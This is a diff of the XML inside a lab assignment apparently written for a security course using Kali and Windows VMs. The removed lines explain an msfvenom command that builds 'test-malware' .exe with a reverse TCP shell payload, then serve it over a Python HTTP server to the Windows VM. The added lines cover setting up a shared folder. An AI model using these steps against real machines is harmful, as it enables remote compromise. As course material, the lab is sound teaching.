-        <w:t>You can safely ignore the warnings. This command creates an .exe file named ‘test-malware’ with a virus.  The ‘-p’ flag specifies the payload that the malware will deliver to the victim; in this case, a reverse TCP shell.  The `-f’ flag specifies the file type created.  The `LHOST’ flag specifies, in this case, the IP address of the machine the payload will try to connect *to* when serving the reverse shell from the victim machine.</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Add a new shared folder, and:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Choose the host path of the shared folder in the ‘Folder Path’ field. This will be the path on your host device.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Name your new folder as “CSE434S-Kali-Shared</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>” .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Select both ‘Auto-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>mount’,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and ‘Make Permanent</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>’ .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Name the guest folder name “CSE434S-share” in ‘Mount point’ field. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1752,123 +1835,38 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="4"/>
         </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Briefly summarize what </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>msfvenom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is and what it is used for:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>===========================================</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>YOUR ANSWER HERE:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>===========================================</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Open a terminal in the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Kali VM, and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> go to /media/sf_CSE434S-share.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1876,91 +1874,92 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="4"/>
         </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Still on the Kali VM, type:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">python3 –m </w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>If you do not have access to the shared folder, try ‘</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">http.server</w:t>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 8000</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>This command starts an HTTP server with the current directory as its root.</w:t>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>adduser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $USER </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>vboxsf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">’ to add yourself to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>vboxsf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> group. You may have to log out and log in again to see the changes. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1969,277 +1968,1134 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="4"/>
         </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Go to your Windows VM, open a browser, and type </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>http://10.0.0.1:8000</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Can you explain what you see?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>===========================================</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>PLEASE EXPLAIN HERE:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>===========================================</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Create a new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file (you can </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>use  the</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">‘touch’ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>command)  and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> verify that you can see the file in your host machine. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Please take a screenshot of your created file as seen on both the Kali VM and the host machine and include the screenshots here.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>===============================================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C7F2A3D" wp14:editId="39E37861">
+            <wp:extent cx="5943600" cy="4457700"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2133157032" name="Picture 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 11"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="4457700"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
